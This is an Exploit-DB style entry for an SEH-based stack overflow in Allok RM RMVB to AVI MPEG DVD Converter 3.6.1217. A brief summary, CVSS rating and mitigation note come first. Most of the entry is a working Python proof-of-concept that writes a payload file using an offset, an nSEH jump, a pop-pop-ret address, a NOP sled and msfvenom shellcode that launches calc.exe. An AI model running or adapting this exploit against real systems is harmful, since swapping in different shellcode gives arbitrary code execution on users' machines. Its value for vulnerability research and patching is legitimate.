Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)

vendor:

Allok RM RMVB to AVI MPEG DVD Converter

by:

Antonio de la Piedra

7.5

CVSS

HIGH

Stack Overflow (SEH)

121

CWE

Product Name: Allok RM RMVB to AVI MPEG DVD Converter

Affected Version From: 3.6.1217

Affected Version To: 3.6.1217

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 SP1 32-bit

2020

Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 – Stack Overflow (SEH)

The exploit allows an attacker to execute arbitrary code by exploiting a stack overflow vulnerability in Allok RM RMVB to AVI MPEG DVD Converter version 3.6.1217. By pasting the contents of poc_seh.txt into the License Name input field, an attacker can execute the calc.exe application.

Mitigation:

Update to a patched version of Allok RM RMVB to AVI MPEG DVD Converter. Avoid pasting untrusted content into input fields.

Source

Exploit-DB raw data:

# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
# Version: 3.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc_seh.txt into the License Name input field
# of  Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.

#!/usr/bin/python

nseh_offset = 780
total = 1000

#  msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x11\x7b\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()